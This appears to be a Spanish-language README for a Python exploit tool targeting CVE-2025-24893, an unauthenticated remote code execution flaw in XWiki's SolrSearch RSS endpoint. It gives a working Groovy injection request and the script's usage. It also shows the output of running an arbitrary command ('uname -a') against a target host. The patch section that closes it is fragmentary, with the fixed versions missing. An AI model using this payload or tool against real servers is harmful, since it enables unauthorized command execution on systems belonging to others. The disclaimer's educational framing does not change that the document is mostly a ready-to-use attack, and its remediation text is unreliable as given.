
CVE-2025-24893 es una vulnerabilidad crítica de ejecución remota de código (RCE) sin autenticación que afecta a la Plataforma XWiki.
Este fallo permite que cualquier usuario invitado inyecte y ejecute código Groovy arbitrario—sin autenticación—a través de una solicitud RSS especialmente diseñada al endpoint SolrSearch.
Esto afecta directamente a la confidencialidad, integridad y disponibilidad del sistema afectado.
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H⚠️ Aviso legal:
Este código está destinado estrictamente a fines educativos y de investigación únicamente. El uso no autorizado en sistemas sin permiso explícito puede constituir una infracción de la ley. El autor no se hace responsable de ningún uso indebido o actividad maliciosa que involucre esta herramienta.
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}println("Hello from search text:42"){{/groovy}}{{/async}}
Esta sección explica cómo configurar y ejecutar el script de exploit en Python para aprovechar CVE-2025-24893.
❯ python3 CVE-2025-24893.py
usage: CVE-2025-24893.py [-h] -u URL -c COMMAND
CVE-2025-24893.py: error: the following arguments are required: -u/--url, -c/--command
❯ python3 CVE-2025-24893.py -u http://10.10.10.10:8080 -c 'uname -a'
[*] Sending payload to: http://10.10.10.10:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln("uname -a".execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d
[+] Command output 'uname -a':
Linux 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
Para corregir la vulnerabilidad, actualice XWiki a una de las siguientes versiones:
Si una actualización no es posible de inmediato, puede aplicar una corrección temporal:
SolrSearchMacros.xml (ubicado en Main.SolrSearchMacros) alrededor de la línea 955.rawResponse con el tipo de contenido establecido en application/xml.macros.vm en la línea 2824 como referencia.Referencias: